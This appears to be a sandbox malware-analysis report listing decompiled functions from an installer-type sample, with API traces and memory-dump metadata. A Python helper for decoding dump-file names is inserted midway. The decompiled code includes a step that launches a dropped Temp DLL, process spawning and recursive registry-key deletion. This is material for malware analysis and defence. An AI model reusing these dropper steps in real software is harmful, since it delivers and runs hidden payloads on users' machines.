                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                        • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                                                        • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                        • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
                                                                        				int _t7;
                                                                        				int _t15;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_t16 = _a4;
                                                                        				if(_a8 == 0x110) {
                                                                        					SetTimer(_t16, 1, 0xfa, 0);
                                                                        					_a8 = 0x113;
                                                                        					 *0x40b020 = _a16;
                                                                        				}
                                                                        				if(_a8 == 0x113) {
                                                                        					_t15 =  *0x789930; // 0x36600
                                                                        					_t7 =  *0x79d938;
                                                                        					if(_t15 >= _t7) {
                                                                        						_t15 = _t7;
                                                                        					}
                                                                        					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
                                                                        					SetWindowTextA(_t16, 0x7898f0);
                                                                        					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
                                                                        					ShowWindow(_t16, 5);
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                                        • MulDiv.KERNEL32(00036600,00000064,?), ref: 00402BF6
                                                                        • wsprintfA.USER32 ref: 00402C09
                                                                        • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                                                        • SetDlgItemTextA.USER32 ref: 00402C21
                                                                        • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: TextWindow$ItemShowTimerwsprintf
                                                                        • String ID:
                                                                        • API String ID: 559026099-0
                                                                        • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                        • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                                                        • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                        • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E00401E34() {
                                                                        				signed int _t7;
                                                                        				void* _t19;
                                                                        				char* _t20;
                                                                        				signed int _t24;
                                                                        				void* _t26;
                                                                        
                                                                        				_t24 = E00402A9A(_t19);
                                                                        				_t20 = E00402A9A(0x31);
                                                                        				_t7 = E00402A9A(0x22);
                                                                        				_push(_t20);
                                                                        				_push(_t24);
                                                                        				_t22 = _t7;
                                                                        				wsprintfA("C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll", "%s %s");
                                                                        				E00401428(0xffffffec);
                                                                        				asm("sbb eax, eax");
                                                                        				asm("sbb eax, eax");
                                                                        				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
                                                                        					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • wsprintfA.USER32 ref: 00401E5A
                                                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                        Strings
                                                                        • %s %s, xrefs: 00401E4E
                                                                        • C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll, xrefs: 00401E53
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ExecuteShellwsprintf
                                                                        • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                        • API String ID: 2956387742-3397750892
                                                                        • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                        • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                                                        • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                        • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				char _v272;
                                                                        				long _t14;
                                                                        
                                                                        				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
                                                                        				if(_t14 == 0) {
                                                                        					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                        						if(_a12 != 0) {
                                                                        							RegCloseKey(_v8);
                                                                        							return 1;
                                                                        						}
                                                                        						if(E00402ADA(_v8,  &_v272, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        					return RegDeleteKeyA(_a4, _a8);
                                                                        				}
                                                                        				return _t14;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                        • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                        • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                        • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401D32() {
                                                                        				void* _t18;
                                                                        				struct HINSTANCE__* _t22;
                                                                        				struct HWND__* _t25;
                                                                        				void* _t27;
                                                                        
                                                                        				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
                                                                        				GetClientRect(_t25, _t27 - 0x40);
                                                                        				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10)); // 0x172 = STM_SETIMAGE, 0x10 = LR_LOADFROMFILE
                                                                        				if(_t18 != _t22) {
                                                                        					DeleteObject(_t18);
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00401D38
                                                                        • GetClientRect.USER32 ref: 00401D45
                                                                        • LoadImageA.USER32 ref: 00401D66
                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                        • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                        • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                                                        • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                        • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
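
The "Memory Dump Source" entries above are not just file names: each `.sdmp` name carries the region's base address, its page protection and its memory type, so the list can be read as a map of the process at dump time (0x401000 is the only executable region listed, the rest are read-only headers and read/write data). The following is an added example, not part of the sandbox report; it decodes those names and picks out the dumps that cover executable pages, which are the ones worth feeding to a disassembler first. The field layout `process.run.id.base.protect.type` is an assumption read off the listing (the first field is taken to be the report's process index, not an OS PID); the protection and type constants are the standard Win32 `MEMORY_BASIC_INFORMATION` values.

```python
"""Decode sandbox memory-dump (.sdmp) file names into region metadata.

Added example, not code from the report. Field layout
process.run.dumpid.base.protect.type is an ASSUMPTION inferred from the
listing; PAGE_* / MEM_* constants are the Win32 VirtualQuery values.
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# process(8 dec).run(8 dec).dumpid(dec).base(16 hex).protect(8 hex).type(8 hex).sdmp
SDMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process: int   # report's process index (assumed; not the OS PID)
    run: int       # analysis stage the dump was taken in (assumed)
    dump_id: int
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        # Any PAGE_EXECUTE* flag lives in the 0x10..0x80 bits.
        return bool(self.protect & 0xF0)

    def protect_name(self) -> str:
        base = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")
        mods = [name for bit, name in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([base] + mods)

    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split an .sdmp file name into its numeric fields."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an sdmp file name: {name!r}")
    process, run, dump_id, base, protect, mem_type = m.groups()
    return DumpRegion(int(process), int(run), int(dump_id),
                      int(base, 16), int(protect, 16), int(mem_type, 16))


def executable_regions(names):
    """Dumps whose pages were executable, lowest base first.

    These are the candidates for unpacked or injected code; read-only and
    read/write regions are headers, .data and heap."""
    regions = (parse_sdmp_name(n) for n in names)
    return sorted((r for r in regions if r.executable), key=lambda r: r.base)


def summarize(names):
    """One line per dump, sorted by base address, with decoded flags."""
    out = []
    for r in sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.base):
        flag = "X" if r.executable else "-"
        out.append(f"proc={r.process} base=0x{r.base:08x} "
                   f"{r.protect_name():<20} {r.type_name():<11} {flag}")
    return out


# Dump names copied from the Memory Dump Source list for this function.
REPORT_DUMPS = [
    "00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp",
    "00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp",
    "00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp",
    "00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp",
    "00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp",
    "00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    print("\n".join(summarize(REPORT_DUMPS)))
```

Run against the six names above, `executable_regions` returns only the 0x401000 dump (PAGE_EXECUTE_READ, MEM_PRIVATE); the 0x400000 and 0x407000 dumps are read-only PE headers and resources, and the 0x409000 and 0x77A000 dumps are the writable data the unpacked payload later works on. If a real analysis produced a dump with PAGE_EXECUTE_READWRITE that is not backed by the image, that is the region to triage first, since a legitimately mapped module would report MEM_IMAGE with read-only code pages.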

                                                                        C-Code - Quality: 35%
                                                                        			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                        				char _v36;
                                                                        				char _v68;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t26;
                                                                        				void* _t34;
                                                                        				signed int _t36;
                                                                        				signed int _t39;
                                                                        				unsigned int _t46;
                                                                        
                                                                        				_t46 = _a12;
                                                                        				_push(0x14);
                                                                        				_pop(0);
                                                                        				_t34 = 0xffffffdc;
                                                                        				if(_t46 < 0x100000) {
                                                                        					_push(0xa);
                                                                        					_pop(0);
                                                                        					_t34 = 0xffffffdd;
                                                                        				}
                                                                        				if(_t46 < 0x400) {
                                                                        					_t34 = 0xffffffde;
                                                                        				}
                                                                        				if(_t46 < 0xffff3333) {
                                                                        					_t39 = 0x14;
                                                                        					asm("cdq");
                                                                        					_t46 = _t46 + 1 / _t39;
                                                                        				}
                                                                        				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                        				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
                                                                        				_t21 = _t46 & 0x00ffffff;
                                                                        				_t36 = 0xa;
                                                                        				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                        				_push(_t46 >> 0);
                                                                        				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
                                                                        				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
                                                                        				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
                                                                        			}

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                                                        • wsprintfA.USER32 ref: 004045DB
                                                                        • SetDlgItemTextA.USER32 ref: 004045EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                        • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                                                        • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                        • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E00401C19(void* __ecx) {
                                                                        				signed int _t30;
                                                                        				CHAR* _t33;
                                                                        				long _t34;
                                                                        				int _t39;
                                                                        				signed int _t40;
                                                                        				int _t44;
                                                                        				void* _t46;
                                                                        				int _t51;
                                                                        				struct HWND__* _t55;
                                                                        				void* _t58;
                                                                        
                                                                        				_t46 = __ecx;
                                                                        				 *(_t58 - 8) = E00402A9A(0x33);
                                                                        				 *(_t58 + 8) = E00402A9A(0x44);
                                                                        				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
                                                                        					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
                                                                        				}
                                                                        				__eflags =  *(_t58 - 0x10) & 0x00000002;
                                                                        				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
                                                                        					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
                                                                        				}
                                                                        				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
                                                                        				_push(1);
                                                                        				if(__eflags != 0) {
                                                                        					_t53 = E00402A9A();
                                                                        					_t30 = E00402A9A();
                                                                        					asm("sbb ecx, ecx");
                                                                        					asm("sbb eax, eax");
                                                                        					_t33 =  ~( *_t29) & _t53;
                                                                        					__eflags = _t33;
                                                                        					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
                                                                        					goto L10;
                                                                        				} else {
                                                                        					_t55 = E00402A7D();
                                                                        					_t39 = E00402A7D();
                                                                        					_t51 =  *(_t58 - 0x10) >> 2;
                                                                        					if(__eflags == 0) {
                                                                        						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
                                                                        						L10:
                                                                        						 *(_t58 - 0x34) = _t34;
                                                                        					} else {
                                                                        						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
                                                                        						asm("sbb eax, eax");
                                                                        						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
                                                                        					}
                                                                        				}
                                                                        				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
                                                                        				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
                                                                        					_push( *(_t58 - 0x34));
                                                                        					E0040591D();
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                        • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                                                        • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                        • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00401E9C() {
                                                                        				void* _t15;
                                                                        				void* _t24;
                                                                        				void* _t26;
                                                                        				void* _t31;
                                                                        
                                                                        				_t28 = E00402A9A(_t24);
                                                                        				E00404D62(0xffffffeb, _t13);
                                                                        				_t15 = E00405247(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                        				 *(_t31 + 8) = _t15;
                                                                        				if(_t15 == _t24) {
                                                                        					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                        				} else {
                                                                        					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                                                        						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) { // poll the child every 100 ms; 0x102 = WAIT_TIMEOUT
                                                                        							E00405CFC(0xf);
                                                                        						}
                                                                        						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
                                                                        						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                                                        							if( *(_t31 - 0x34) != _t24) {
                                                                        								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                        							}
                                                                        						} else {
                                                                        							E0040591D(_t26,  *(_t31 - 0x34));
                                                                        						}
                                                                        					}
                                                                        					_push( *(_t31 + 8));
                                                                        					CloseHandle();
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                          • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                          • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                        • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                        • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 4003922372-47812868
                                                                        • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                        • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                                                        • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
